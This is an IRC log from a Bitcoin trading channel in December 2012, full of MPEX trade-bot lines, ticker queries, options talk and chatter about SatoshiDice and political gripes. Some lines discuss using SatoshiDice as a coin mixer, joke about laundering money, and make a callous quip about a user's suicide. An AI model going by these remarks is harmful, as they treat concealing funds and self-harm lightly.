06:40:23 [MPEX] [S.MPOE] 5000 @ 0.00064 = 3.2 BTC [+] Dec 28 06:42:54 ok, assuming there are no more bugs, I've got a decent amount of optimization to do Dec 28 06:44:15 lol Dec 28 06:44:22 [MPEX] [S.MPOE] 9200 @ 0.00064 = 5.888 BTC [+] Dec 28 06:44:48 ;;bc,24hprc Dec 28 06:44:49 13.33 Dec 28 06:48:03 [MPEX] [S.MPOE] 4429 @ 0.00064 = 2.8346 BTC [+] **** BEGIN LOGGING AT Fri Dec 28 14:15:15 2012 Dec 28 14:30:46 hm, are anyone else's intertubes all bolloxed up ? Dec 28 14:31:02 you settlements are all bolloxed up Dec 28 14:31:09 I can send details Dec 28 14:31:21 please do Dec 28 14:37:26 check the office@polimedia email. Dec 28 14:39:15 ye on it. Dec 28 14:53:10 [MPEX] [S.MPOE] 6635 @ 0.00064 = 4.2464 BTC [+] Dec 28 15:02:01 [MPEX] [S.MPOE] 10987 @ 0.00064 = 7.0317 BTC [+] Dec 28 15:11:48 how many are the putting in one device? Dec 28 15:11:55 300MH/chip? Dec 28 15:16:05 Whales are back betting on S.DICE again Dec 28 15:16:08 BFL is going to be sending me money very soon Dec 28 15:16:19 might eb cancelling Dec 28 15:16:20 S.DICE up another 1000 BTC this morning. Dec 28 15:16:38 looking at Dooglus post? Dec 28 15:16:42 no Dec 28 15:16:45 my own analysis Dec 28 15:16:49 ahh Dec 28 15:17:01 oh yeah - you post in that thread as well Dec 28 15:17:15 I only consider bets over 10BTC Dec 28 15:17:21 since the last dooglas post Dec 28 15:17:40 with 250 BTC bets things can move quickly Dec 28 15:17:57 I think S.DICE is now >18,000 profit this month Dec 28 15:18:30 http://satoshidice.com/lookup.php?tx=&limit=1000&min_bet=10&status=ALL Dec 28 15:19:15 hah Dec 28 15:19:22 I don't think S.DICE mixes Dec 28 15:19:35 but I don't know much Dec 28 15:19:38 about that stuff Dec 28 15:19:48 I use Gox for that Dec 28 15:20:03 not mixing but atleast losing some identity Dec 28 15:20:17 when i feel the need Dec 28 15:20:57 the need for speed Dec 28 15:21:18 [MPEX] [S.MPOE] 23800 @ 0.00064 = 15.232 BTC [+] Dec 28 15:22:57 way to go Goose Dec 28 15:34:54 [MPEX] [S.MPOE] 26956 @ 0.00064 = 17.2518 BTC [+] Dec 28 15:39:28 re sdice and mixing Dec 28 15:39:44 wouldn't the fact that they always repay to the address that sent make it impossible to use as a mixer ? Dec 28 15:39:51 i mean, what exact identity is lost ? Dec 28 15:40:53 if anything, it would degrade anonimity i imagine. Dec 28 15:41:01 yes Dec 28 15:41:06 that is my understanding Dec 28 15:44:09 well so then wtf people keep going "o, it's used for mixing" as if it's some arcana they know about Dec 28 15:44:17 fucking hell i need to stop listening to people. Dec 28 15:49:38 [MPEX] [S.MPOE] 2600 @ 0.00064 = 1.664 BTC [+] Dec 28 15:53:32 btw jurov i always meant to ask, what's the br in coinbr stand for ? brazil ? Dec 28 15:53:35 well the coins you get back come from sdice, so there is at least that link Dec 28 15:53:44 BRoker Dec 28 15:55:21 o Dec 28 15:55:33 why not cnbroker lol Dec 28 15:56:23 pigeons what i mean is, sdice does not sever the link. sure it varies the amt. Dec 28 15:56:55 i agree Dec 28 15:57:33 easy to agree with facts Dec 28 15:57:37 ianae, but i imagine the only way to correctly mix is to use a single inbound address. Dec 28 15:58:08 that pretty much makes all outbound coins "virgin" Dec 28 15:58:22 in the same sense if not exactly in the same way as freshly minted coins Dec 28 15:59:25 i'll let you lousy criminals speculate Dec 28 16:00:47 [MPEX] [S.MPOE] 5350 @ 0.00064 = 3.424 BTC [+] Dec 28 16:07:47 laundering that porn money Dec 28 16:09:33 http://polimedia.us/dtng/c/src/135670319079.jpg Dec 28 16:09:42 she begs to differ. Dec 28 16:15:16 [MPEX] [S.MPOE] 7250 @ 0.00064 = 4.64 BTC [+] Dec 28 16:49:41 [MPEX] [S.MPOE] 12050 @ 0.00064 = 7.712 BTC [+] Dec 28 16:52:13 EskimoBob: mircea_popescu has had you on ignore for months Dec 28 16:55:48 [MPEX] [S.MPOE] 35694 @ 0.00064 = 22.8442 BTC [+] Dec 28 16:58:07 [MPEX] [S.MPOE] 12754 @ 0.00064 = 8.1626 BTC [+] Dec 28 17:00:24 [MPEX] [S.MPOE] 11485 @ 0.00064 = 7.3504 BTC [+] Dec 28 17:06:00 EskimoBob: the bully Dec 28 17:06:46 who will indirectly cost me 20 btc because he will drive usagi to suicide Dec 28 17:07:00 net win Dec 28 17:08:15 :( Dec 28 17:11:30 [MPEX] [S.MPOE] 24400 @ 0.00064 = 15.616 BTC [+] Dec 28 17:21:48 [MPEX] [S.MPOE] 10800 @ 0.00064 = 6.912 BTC [+] Dec 28 17:24:19 [MPEX] [S.MPOE] 11600 @ 0.00064 = 7.424 BTC [+] Dec 28 17:50:41 heavy betting continues on S.DICE Dec 28 17:51:05 S.DICE lead down to 600 BTC on the morning Dec 28 17:51:42 whats the bet count? Dec 28 17:52:21 actually up 600 in last 32 hours Dec 28 17:52:56 bet count of 11,000 since 12-27-12 7:00 Dec 28 17:54:32 looks like your speculation is proving right Dr. Bugpowder Dec 28 17:54:40 its Dr. right? Dec 28 17:57:17 yup Dec 28 17:58:35 so Dr. Bugpowder what are you gonna do with your bonus paid for by the ghost of satoshi? Dec 28 17:59:22 SPLIT 14 strike options and sell them short Dec 28 18:01:51 you think the price will hit 14 this month? Dec 28 18:05:05 who knows Dec 28 18:05:30 I care what it does next month Dec 28 18:05:47 and what range it does or does not stay within Dec 28 18:06:03 ;;ticker Dec 28 18:06:04 BTCUSD ticker | Best bid: 13.45011, Best ask: 13.48408, Bid-ask spread: 0.03397, Last trade: 13.45011, 24 hour volume: 20887.52776928, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.39768 Dec 28 18:06:31 it will likely close no greater than 13.50 tonight Dec 28 18:06:46 a whale may come in and adjust the price thougb Dec 28 18:08:09 well as long as it stays between 11 and 17, I made money on options selling this month Dec 28 18:08:28 thats a wide position Dec 28 18:08:34 thats what she said Dec 28 18:12:01 [MPEX] [S.MPOE] 9500 @ 0.00064 = 6.08 BTC [+] Dec 28 18:17:58 [MPEX] [S.MPOE] 11805 @ 0.00064 = 7.5552 BTC [+] Dec 28 18:19:25 [MPEX] [S.MPOE] 10900 @ 0.00064 = 6.976 BTC [+] Dec 28 18:28:47 [MPEX] [S.MPOE] 3350 @ 0.00064 = 2.144 BTC [+] Dec 28 18:49:55 [MPEX] [S.MPOE] 12100 @ 0.00064 = 7.744 BTC [+] Dec 28 18:59:17 [MPEX] [S.MPOE] 13300 @ 0.00064 = 8.512 BTC [+] Dec 28 19:00:50 https://bitcointalk.org/index.php?topic=133700.0 Dec 28 19:00:51 hmm Dec 28 19:04:19 ;;title https://bitcointalk.org/index.php?topic=133702.0;topicseen Dec 28 19:04:20 What is the difference between MtGox and Dwalla? Dec 28 19:15:07 pigeons is what you said about pigeons true? Dec 28 19:21:02 close enough i reckon Dec 28 19:21:06 which thing? Dec 28 19:22:07 about the original pigeons being extinct Dec 28 19:22:11 yeah Dec 28 19:22:15 and the ones we find and citys and parks now are escaped pets Dec 28 19:22:18 that shit is nuts Dec 28 19:22:24 like some conspiracy shit Dec 28 19:22:45 I have an interesting idea for an offering but I will need to periodically perform reverse splits. Dec 28 19:22:48 (i.e. 1000 shares reverse split to 990 shares). Do any exchanges support share splits? Dec 28 19:22:51 >< Dec 28 19:22:58 stupid text wall Dec 28 19:23:19 http://en.wikipedia.org/wiki/Passenger_Pigeon Dec 28 19:23:44 these are the ones you see now: http://en.wikipedia.org/wiki/Rock_Dove Dec 28 19:23:55 ;;bc,24hprc Dec 28 19:23:56 13.34 Dec 28 19:24:52 whoa Dec 28 19:25:05 ugh stupid option key Dec 28 19:25:11 thestringpuller: probably not programatically, but I'm sure most, if run by good people, would do it manually Dec 28 19:25:46 oh good people, this is bitcoin Dec 28 19:26:07 oh, thestringpuller you were quoting :| Dec 28 19:26:11 that was a post Dec 28 19:26:12 yea quote Dec 28 19:26:14 i'm on a ma Dec 28 19:26:15 mac Dec 28 19:26:21 I'm having trouble Dec 28 19:26:47 yeah they don't right-click either, i didnt know thye had problems with quote marks too Dec 28 19:27:14 they have trouble with giving me any keys other than apple button or options Dec 28 19:27:14 so it turns out, you can't use gmail to send thousands of emails per day to yourself Dec 28 19:27:17 option* Dec 28 19:33:45 "arg parser!" sometimes escapes my mouth in place of "aw, FUCK!" Dec 28 19:41:22 [MPEX] [S.MPOE] 3175 @ 0.00064 = 2.032 BTC [+] Dec 28 19:44:46 smickles: are you writing Python REPL's? Dec 28 19:45:06 [MPEX] [S.MPOE] 3200 @ 0.00064 = 2.048 BTC [+] Dec 28 19:45:48 http://krugman.blogs.nytimes.com/2012/12/28/policy-implications-of-capital-biased-technology-opening-remarks/ Dec 28 19:51:11 buy my puts :D Dec 28 19:55:31 [MPEX] [S.MPOE] 33288 @ 0.00064 = 21.3043 BTC [+] Dec 28 19:58:17 jcpham: so, because people are rightly trying to avoid the higher form taxes, the people who plan to be depandant on that specific sort of tax revenue are boned? Dec 28 19:58:33 [MPEX] [S.MPOE] 3600 @ 0.00064 = 2.304 BTC [+] Dec 28 19:58:37 something like that is what i read Dec 28 19:58:45 that crazy krugman Dec 28 19:58:55 give him another nobel prize Dec 28 19:59:14 nobel prized a perfect, Dec 28 19:59:20 I love Obama's Dec 28 19:59:57 obama's was the peace prize for drone attacks, afghanistan and iraq? Dec 28 20:01:16 obama won a nobel prize? Dec 28 20:01:26 yup, a for peace Dec 28 20:01:29 are you making that up? Dec 28 20:01:32 no Dec 28 20:01:39 smh Dec 28 20:01:57 lol Dec 28 20:02:06 and he got it after ordering things which resulted in innocent deaths Dec 28 20:02:10 if he gets one everyone else gets 100 Dec 28 20:02:17 nobel prizes Dec 28 20:02:41 and then went on to doing drone strikes which ended up killing children Dec 28 20:02:58 and then pretending to cry about the deaths of children which he didn't cause Dec 28 20:03:07 pretty lame president if you don't kill somebody Dec 28 20:03:52 and trying, maybe succeding to make it legal to kidnap and kill citizens w/o cause, documentation, trial, etc... Dec 28 20:04:01 it's one sweet peace prize Dec 28 20:04:45 you must think you have rights or something Dec 28 20:05:08 I'm just an uppity slave :p Dec 28 20:05:08 authoritarian regimes never allow citizens to affect change Dec 28 20:05:27 make sure to encrypt those emails kids Dec 28 20:07:01 I don't even have a proper job, I'm not a good slave at all :/ Dec 28 20:08:36 but i suppose my wife being active duty makes up for my working for myself, rather than someone else Dec 28 20:09:51 smickles obeys the law though Dec 28 20:15:27 yeah, I don't want to get in trouble :| Dec 28 20:16:05 if the law gets too out of hand, i'll try to move somewhere else first Dec 28 20:16:29 kinda like the 'vote with you dollar' concept Dec 28 20:26:05 thats too smooth Dec 28 20:26:24 if it gets too outta hand Dec 28 20:26:28 just leave heh Dec 28 20:30:32 [MPEX] [S.MPOE] 9799 @ 0.00064 = 6.2714 BTC [+] Dec 28 20:33:22 [MPEX] [S.MPOE] 3400 @ 0.00064 = 2.176 BTC [+] Dec 28 20:46:08 i'm sort of waiting for the day i'm branded a terrorist myself Dec 28 20:46:11 for using funny internet money Dec 28 20:46:17 vote wit yah feet Dec 28 20:46:21 market making, profit taking Dec 28 21:07:42 mircea_popescu: "Your order #4828665 has been canceled" << see what's missing there? Dec 28 21:08:24 nope :D Dec 28 21:08:32 ;;google canceled Dec 28 21:08:33 Cancelled Vs Canceled | Reference.com Answers: ; canceled - definition of canceled by the Free Online Dictionary ...: ; Is the correct spelling of the word 'cancelled' or 'canceled': Dec 28 21:08:37 mmm Dec 28 21:08:43 lol Dec 28 21:10:33 i lost a 6850 this week Dec 28 21:10:51 old age ? Dec 28 21:11:22 actually it has already been rma'd once Dec 28 21:11:25 it just sucks Dec 28 21:11:34 i just bought this: http://www.newegg.com/Product/Product.aspx?Item=N82E16814202010 Dec 28 21:11:40 to replace it while i rma it again Dec 28 21:12:57 i'll gpu mine until i have to pay for a power bill Dec 28 21:13:52 ;;bc,24hprc Dec 28 21:13:54 13.33 Dec 28 21:14:58 uh-oh, jurov it's having trouble finding order #'s now :o Dec 28 21:19:09 ;;ticker Dec 28 21:19:10 BTCUSD ticker | Best bid: 13.40091, Best ask: 13.44997, Bid-ask spread: 0.04906, Last trade: 13.40091, 24 hour volume: 21262.83730854, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.41324 Dec 28 21:19:35 5 hours till settlement no? Dec 28 21:19:43 there abouts Dec 28 21:19:50 it's 19:19 utc Dec 28 21:20:17 so 5.79 hrs, i think Dec 28 21:20:34 4.79 Dec 28 21:20:50 heh, yes, 4.79 Dec 28 21:21:40 secret of my success baby Dec 28 21:22:50 lol Dec 28 21:25:12 there is nothing to do at work Dec 28 21:25:38 they are essentially paying me to talk here Dec 28 21:27:42 i'm about to leave work myself Dec 28 21:27:50 be back wednesday Dec 28 21:30:38 i wish i could leave Dec 28 21:30:55 just do it. screw those bosses and their work Dec 28 21:31:30 lol Dec 28 21:31:37 dissident are we? Dec 28 21:32:15 mvp's usually are Dec 28 21:33:03 [MPEX] [S.MPOE] 6106 @ 0.00064 = 3.9078 BTC [+] Dec 28 21:41:39 [MPEX] [S.MPOE] 4436 @ 0.00064 = 2.839 BTC [+] Dec 28 21:45:16 https://lh4.googleusercontent.com/-OKFhItNAjZI/UN30OiV0H3I/AAAAAAAAMxA/c_tp4ihAU40/s640/meth+masturbation.jpg Dec 28 21:46:05 [MPEX] [S.MPOE] 11750 @ 0.00064 = 7.52 BTC [+] Dec 28 21:56:24 [MPEX] [S.MPOE] 12000 @ 0.00064 = 7.68 BTC [+] Dec 28 21:57:43 lol thestringpuller-pr Dec 28 22:06:45 smickles, told ya Dec 28 22:06:57 evening. Dec 28 22:07:08 'night Dec 28 22:12:39 [MPEX] [S.MPOE] 10154 @ 0.00064 = 6.4986 BTC [+] Dec 28 22:13:01 [MPEX] [S.MPOE] 2500 @ 0.00064 = 1.6 BTC [+] Dec 28 22:17:58 not yet Dec 28 22:22:50 ;;ident jurov Dec 28 22:22:51 Nick 'jurov', with hostmask 'jurov!~jurov@2001:5c0:1400:b::1245', is identified as user jurov, with GPG key id 677ABD62D0AEE7D7, key fingerprint BBB0A99950037551F533850A677ABD62D0AEE7D7, and bitcoin address None Dec 28 22:23:18 i heard there was some filthy impostor doing mpex fundings with smickles Dec 28 22:24:04 ;;rated smickles Dec 28 22:24:05 You have not yet rated user smickles Dec 28 22:24:11 ;;rate smickles 1 Dec 28 22:24:17 Rating entry successful. Your rating of 1 for user smickles has been recorded. Dec 28 22:25:09 ;;rated Ukto Dec 28 22:25:10 You have not yet rated user Ukto Dec 28 22:25:33 ;;rate Ukto 2 pleasure to work with him (no homo) Dec 28 22:25:40 Rating entry successful. Your rating of 2 for user Ukto has been recorded. Dec 28 22:25:54 roflol Dec 28 22:28:07 ;;rated jurov Dec 28 22:28:08 You have not yet rated user jurov Dec 28 22:28:32 ;;rate jurov 10 Dec 28 22:28:33 Error: You cannot rate yourself. Dec 28 22:34:52 [MPEX] [S.MPOE] 21070 @ 0.00064 = 13.4848 BTC [+] Dec 28 22:38:56 [MPEX] [S.MPOE] 14843 @ 0.00064 = 9.4995 BTC [+] Dec 28 22:42:29 heh, thx jurov Dec 28 22:47:13 Latest Dooglas post is out. 33737.14961221 Profit for S.DICE Dec 28 22:47:27 so up to ~17,700 for the month Dec 28 22:47:40 WHERE DID THE BUYERS GO?? Dec 28 22:48:15 If only these S.MPOE bots would train there sights on S.DICE we could get a decent valuation. Dec 28 22:48:33 ;;ticker Dec 28 22:48:33 BTCUSD ticker | Best bid: 13.45768, Best ask: 13.49769, Bid-ask spread: 0.04001, Last trade: 13.49883, 24 hour volume: 23420.32427228, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.42037 Dec 28 22:51:03 ;;calc 17700 / 100000000 / 0.0037 Dec 28 22:51:03 0.0478378378378 Dec 28 22:51:40 ;;calc 1500000*0.0037 Dec 28 22:51:40 5550 Dec 28 22:51:50 anyone have 5550 or so btc to lend? Dec 28 22:52:19 I'll pay back 1% per the term Dec 28 22:53:28 term ending on jan 6 Dec 28 22:53:35 Bugpowder, how exactly do you suppose the bots for s.dice would work? Dec 28 22:53:40 buy Dec 28 22:53:50 same way they are working for S.MPOE Dec 28 22:53:53 just buy Dec 28 22:54:05 I haven't seen a sell on S.MPOE in 2 days Dec 28 22:54:22 oh...er...how do you know these are bots? Dec 28 22:54:25 14,000,000 shares Dec 28 22:54:36 what else could they be Dec 28 22:54:48 A steady drip of 2-20BTC buys Dec 28 22:54:53 ;;ticker Dec 28 22:54:53 BTCUSD ticker | Best bid: 13.42001, Best ask: 13.49999, Bid-ask spread: 0.07998, Last trade: 13.42001, 24 hour volume: 24188.06995503, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.42310 Dec 28 22:55:01 ;;ticker Dec 28 22:55:01 BTCUSD ticker | Best bid: 13.42001, Best ask: 13.48878, Bid-ask spread: 0.06877, Last trade: 13.42001, 24 hour volume: 24188.06995503, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.42310 Dec 28 22:55:15 13.5 is going Dec 28 22:55:17 down Dec 28 22:55:19 ;;ticker Dec 28 22:55:20 BTCUSD ticker | Best bid: 13.41102, Best ask: 13.48877, Bid-ask spread: 0.07775, Last trade: 13.41102, 24 hour volume: 24188.07995503, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.42310 Dec 28 22:55:29 i can imagine someone programmed a "bot" for dripping buys of s.mpoe Dec 28 22:55:46 it's weird Dec 28 22:55:48 but that's just a script, not a real bot that makes decisions Dec 28 22:55:55 yeah Dec 28 22:56:08 but its just super steady small lot buys Dec 28 22:56:13 all day all night Dec 28 22:56:21 [MPEX] [S.MPOE] 7791 @ 0.00064 = 4.9862 BTC [+] Dec 28 22:56:24 cough Dec 28 22:56:31 well Dec 28 22:56:41 I hope it keeps up through the divvy payment Dec 28 22:56:44 :) Dec 28 22:57:02 [MPEX] [S.MPOE] 100 @ 0.00064 = 0.064 BTC [+] Dec 28 22:57:23 it's like someone forgot to change the setting on their bot after the secondary offering Dec 28 22:57:41 And they have 1000s of coins to play with Dec 28 22:59:00 but why would they do it? Dec 28 22:59:24 they are gone on vacation Dec 28 22:59:31 [MPEX] [S.DICE] 10 @ 0.00351365 = 0.0351 BTC [+] Dec 28 22:59:52 YAY Dec 28 23:00:10 I might be overexposed to S.DICE Dec 28 23:00:15 no i mean.. do they fear that buying it all in one go would cause X? Dec 28 23:00:55 it's like they have a bot that hits the ask every 15 minutes Dec 28 23:01:18 and sells when the bid goes over the purchase price Dec 28 23:01:26 maybe to try to catch some lower sells Dec 28 23:01:30 but it cant go over cause the secondary offering Dec 28 23:01:32 [MPEX] [S.MPOE] 7350 @ 0.00064 = 4.704 BTC [+] Dec 28 23:01:38 LOL Dec 28 23:01:54 smickles yes, their idea might be, to get better price.. but that's totally not working now Dec 28 23:04:05 The funny thing is.... it's not exploitable by us either Dec 28 23:04:34 .. unless someone lends me 4800 btc, ofc Dec 28 23:05:13 ;;getrating jurov Dec 28 23:05:14 Currently authenticated from hostmask jurov!~jurov@2001:5c0:1400:b::1245 . User jurov, rated since Fri Jan 20 15:16:32 2012. Cumulative rating 17, from 11 total ratings. Received ratings: 11 positive, 0 negative. Sent ratings: 8 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jurov Dec 28 23:06:02 jurov: what rate would you pay for ~100 btc? Dec 28 23:06:34 ;;ticker Dec 28 23:06:35 BTCUSD ticker | Best bid: 13.41005, Best ask: 13.48989, Bid-ask spread: 0.07984, Last trade: 13.49995, 24 hour volume: 24497.02820033, 24 hour low: 13.25000, 24 hour high: 13.64990, 24 hour vwap: 13.42369 Dec 28 23:07:07 i won't make a scratch on that wall with 100btc Dec 28 23:07:45 I just figured i'd go fishin' Dec 28 23:08:38 ;;calc .00064*6234323 Dec 28 23:08:38 3989.96672 Dec 28 23:09:07 3 more days like this and its gone Dec 28 23:09:56 [MPEX] [S.MPOE] 9200 @ 0.00064 = 5.888 BTC [+] Dec 28 23:10:46 someone should be watching known/suspected mircea addys for possible connection to these buys, on the off chance that a connection is made Dec 28 23:11:06 it'd be complicated tho Dec 28 23:12:49 I should just pretend to do it and make regular reports saying there is no connection to raise confidence Dec 28 23:15:37 how do you calculate being overexposed ? Dec 28 23:16:34 probably something to do with the slipage involved with a sale of a large portion of it Dec 28 23:16:53 i been trying to calc stuff like that with about 0 success Dec 28 23:16:59 mostly cause the market is so random Dec 28 23:17:20 soh Dec 28 23:17:34 mpex has 30times the volume of largest SL exchange Dec 28 23:17:36 then incorporate random walk theory mircea_popescu ;) Dec 28 23:18:08 SL? Dec 28 23:18:16 second life Dec 28 23:18:16 smickles ya lol Dec 28 23:18:23 shit i dont even have the first one Dec 28 23:18:24 excep this is more like random pounce Dec 28 23:18:35 yest i looked into market, there were absolutely NO offers of s.mpoe Dec 28 23:18:38 other than mine Dec 28 23:19:10 more dividend power Dec 28 23:19:19 buyers market at this poinr Dec 28 23:19:43 mircea_popescu: that's a spooky fact Dec 28 23:20:27 maybe it's cause there arn't enough people will balls enough to short it Dec 28 23:20:55 that's the other thing, theres a PILE of buys Dec 28 23:21:00 or was Dec 28 23:21:17 ya still is. Dec 28 23:21:20 all paid in advance Dec 28 23:21:26 Bugpowder yes. Dec 28 23:21:36 [MPEX] [S.MPOE] 2300 @ 0.00064 = 1.472 BTC [+] Dec 28 23:21:43 fact is, i've seen more nonsense in btc finance than all togetgher anywhere else all time. Dec 28 23:21:54 embodiment of fucken chaos. Dec 28 23:25:08 goes together with the crypto anarchism i guess Dec 28 23:32:07 [MPEX] [S.MPOE] 1600 @ 0.00064 = 1.024 BTC [+] Dec 28 23:32:16 Well, its 3.38M shares of bids > .00058 Dec 28 23:32:24 around 2100BTC Dec 28 23:33:15 And if this tier sells thru, the bot might make a profit Dec 28 23:33:16 heh Dec 28 23:41:22 ;;ticker Dec 28 23:41:23 BTCUSD ticker | Best bid: 13.42002, Best ask: 13.50000, Bid-ask spread: 0.07998, Last trade: 13.42002, 24 hour volume: 22418.93354803, 24 hour low: 13.30000, 24 hour high: 13.64990, 24 hour vwap: 13.43718 Dec 28 23:45:53 course some it bought at 6.2 Dec 28 23:45:57 there were 10mn at 6.2 too\ Dec 28 23:48:00 yeah I wanted in at 62 but had no free capital Dec 28 23:48:26 compared to the earlier buy of sdice at 18... Dec 28 23:48:37 ima be telling my grandkids about that Dec 28 23:49:20 yeah but very low volume Dec 28 23:49:22 on the 18 Dec 28 23:49:23 right? Dec 28 23:49:33 no ? Dec 28 23:49:38 like 1,5mn Dec 28 23:49:41 I thought it was only like 300 shares that popped off at that price Dec 28 23:49:43 o Dec 28 23:49:48 was a small one early Dec 28 23:49:53 the next day, massive sellout Dec 28 23:50:06 let me find this Dec 28 23:50:11 I dare say it spooked the market Dec 28 23:50:20 S.DICE price has never recovered Dec 28 23:51:34 Dec 21 23:50:23 [MPEX] [S.DICE] 506 @ 0.00190007 = 0.9614 BTC [-] Dec 28 23:51:34 Dec 21 23:50:24 [MPEX] [S.DICE] 5000 @ 0.00190001 = 9.5001 BTC [-] Dec 28 23:51:34 Dec 21 23:50:26 [MPEX] [S.DICE] 507115 @ 0.0018 = 912.807 BTC [-] Dec 28 23:51:34 Dec 21 23:50:27 [MPEX] [S.DICE] 995840 @ 0.0014 = 1394.176 BTC [-] Dec 28 23:52:56 fuck that Dec 28 23:53:14 lol Dec 28 23:53:25 lol, someone sold right b/f the end of the world Dec 28 23:54:03 whoa Dec 28 23:54:10 i didn't notice this at the time Dec 28 23:54:19 you seriously telling me it was a millenarist thing ?! Dec 28 23:54:27 maybe Dec 28 23:54:31 cryptoanarchist Dec 28 23:54:36 what were they going to do with bitcoins ? Dec 28 23:54:51 go to space w/ the greys Dec 28 23:55:09 why bitcoin and not bottlecaps ? Dec 28 23:56:01 bitcoins, being man's great acheivement, are like aboriginal boomerangs to the greys Dec 28 23:56:28 o i c Dec 28 23:56:54 i'll say this, it may be the case we have a real market here on the strength of the criteria that it makes absolutely no sense. Dec 28 23:59:27 no sense? it's an unyeilding techincal (chartist) breakout Dec 28 23:59:49 and it has the best fundamentals of any freely available bitcoin investment Dec 29 00:00:27 mircea_popescu: face facts, you're winning Dec 29 00:00:27 lol ok. i never got very far into ta Dec 29 00:02:28 yeah, I only get as far as to tell people 'you are drawing lines on a chart. you are an idiot. Dec 29 00:02:48 Damn. SP500 closed at 1402. Dec 29 00:02:52 well, these bots Bugpowder was complaining weren't on s.dice too are probably running on TA Dec 29 00:03:15 Would have bot SP500 if I saw the drop Dec 29 00:03:30 Bigger dump if no deal though Dec 29 00:03:32 come on! Dec 29 00:03:58 igot news for you mr Dec 29 00:04:08 there's not going to be any deal and the stocks will continue to appreciate Dec 29 00:04:20 yes Dec 29 00:04:27 they are completely divorced from any fundamentals, the nyse is currently running its very own version of the stock generation scam Dec 29 00:04:29 this is why I need to buy on the panic Dec 29 00:04:36 comming up next, rule 42 or w/e the fuck Dec 29 00:04:49 lol, i can see it now. continue to buy and hold until taxes are lowered again Dec 29 00:04:55 the only way to keep pace with the printing is to own stocks Dec 29 00:05:22 taxes are never lowered again. Dec 29 00:05:24 taxes are never going lower than this Dec 29 00:05:29 the us is headed straight for central planning. Dec 29 00:05:33 they are insanely low Dec 29 00:05:33 haha werd. Dec 29 00:06:03 going over cliff is US's best hope I think Dec 29 00:06:20 owning shares makes absolutely no sense. Dec 29 00:06:20 Also I don't mind paying more in taxes as long as everyone else must too Dec 29 00:06:27 what do these shares represent ? the government runs the corp anyway. Dec 29 00:07:09 ;;calc (1402-666)/666 Dec 29 00:07:09 1.10510510511 Dec 29 00:07:19 110% return from the lows to today Dec 29 00:07:26 not bad for an index Dec 29 00:07:30 of real money Dec 29 00:07:36 not game currency Dec 29 00:08:24 i'm with jp morgan. Dec 29 00:08:35 if i don't trust a man he can't have any money from me on all the bonds in christendom Dec 29 00:08:38 I somehow feel that S.DICE shares have more risk than SPY.... but.. maybe I am not with the new way Dec 29 00:08:44 and i don't trust obama, bernanke and co Dec 29 00:08:51 consequently, i own exactly 0 us equities. Dec 29 00:09:28 foriegn equities? Dec 29 00:09:30 some Dec 29 00:10:23 Did the S.MPOE bot hear us and get turned off? Dec 29 00:10:44 haha did it ? Dec 29 00:10:45 ;;ticker Dec 29 00:10:46 BTCUSD ticker | Best bid: 13.45101, Best ask: 13.50000, Bid-ask spread: 0.04899, Last trade: 13.45101, 24 hour volume: 22730.04896326, 24 hour low: 13.33001, 24 hour high: 13.64990, 24 hour vwap: 13.44036 Dec 29 00:10:57 <1000 BTC ask at 13.5 Dec 29 00:10:58 ;;bc,24hprc Dec 29 00:10:59 13.36 Dec 29 00:12:32 http://polimedia.us/dtng/c/src/135673209237.jpg ahahaha this! Dec 29 00:12:59 lol Dec 29 00:14:08 [MPEX] [S.MPOE] 3350 @ 0.00064 = 2.144 BTC [+] Dec 29 00:14:25 people, buy/sell my options offers, there's still plenty of time b/f maturity :D Dec 29 00:15:25 is settelment done with 24hprc, 24vwap, or spot? Dec 29 00:15:39 24hprc = 24vwap Dec 29 00:15:48 look up Dec 29 00:15:56 ;;bc,24hprc Dec 29 00:15:57 13.36 Dec 29 00:15:59 ;;ticker Dec 29 00:15:59 BTCUSD ticker | Best bid: 13.45112, Best ask: 13.49990, Bid-ask spread: 0.04878, Last trade: 13.45112, 24 hour volume: 22730.29997529, 24 hour low: 13.33001, 24 hour high: 13.64990, 24 hour vwap: 13.44044 Dec 29 00:16:09 Bugpowder: bc,24hprc Dec 29 00:16:11 a Dec 29 00:16:18 the ticker is mtgox only i think ? Dec 29 00:16:21 I think 24hprc is off Dec 29 00:16:46 it's what is being reported by bitcoincharts Dec 29 00:16:56 http://bitcoincharts.com/markets/currencies/ Dec 29 00:16:59 and that's what mpex uses Dec 29 00:16:59 ya 13.36 it says Dec 29 00:17:12 it was 13.33 only an hour or so ago Dec 29 00:17:18 I see Dec 29 00:17:28 volume is 10x on gox Dec 29 00:17:37 but other have prices down at 13.1 Dec 29 00:17:39 still Dec 29 00:17:42 but im pretty sure it's a vwap, because of its behaviour when volume occurs Dec 29 00:17:52 13.2 Dec 29 00:18:01 so i think ticker is mtgox vwap only and 24hprc is all exchanges Dec 29 00:18:23 ;;(14-13.36)/13.36 Dec 29 00:18:24 Error: "(14-13.36)/13.36" is not a valid command. Dec 29 00:18:27 ;;calc (14-13.36)/13.36 Dec 29 00:18:28 0.0479041916168 Dec 29 00:18:57 I sold 100 calls and puts at 14 for about .20 average Dec 29 00:18:59 happy Dec 29 00:19:17 good move. Dec 29 00:19:25 very stable month Dec 29 00:19:58 ;;ticker Dec 29 00:19:59 BTCUSD ticker | Best bid: 13.45114, Best ask: 13.49990, Bid-ask spread: 0.04876, Last trade: 13.45114, 24 hour volume: 22742.72980548, 24 hour low: 13.33001, 24 hour high: 13.64990, 24 hour vwap: 13.44065 Dec 29 00:20:13 lol Dec 29 00:20:26 ;;bc,24hrpc Dec 29 00:20:26 Error: "bc,24hrpc" is not a valid command. Dec 29 00:20:44 smickles whats that command... Dec 29 00:20:50 stable 2 months, i say, i sold about 40 contracts to the bot when they were 'N's at the beginning of the month and stand to make ~13% on them Dec 29 00:20:59 ;;bc,24hprc Dec 29 00:21:01 13.36 Dec 29 00:21:45 yea its been remarkably calm Dec 29 00:21:48 esp with the halving and all Dec 29 00:25:22 boom Dec 29 00:25:27 ;;ticker Dec 29 00:25:27 BTCUSD ticker | Best bid: 13.45114, Best ask: 13.50999, Bid-ask spread: 0.05885, Last trade: 13.45114, 24 hour volume: 23720.51157629, 24 hour low: 13.33001, 24 hour high: 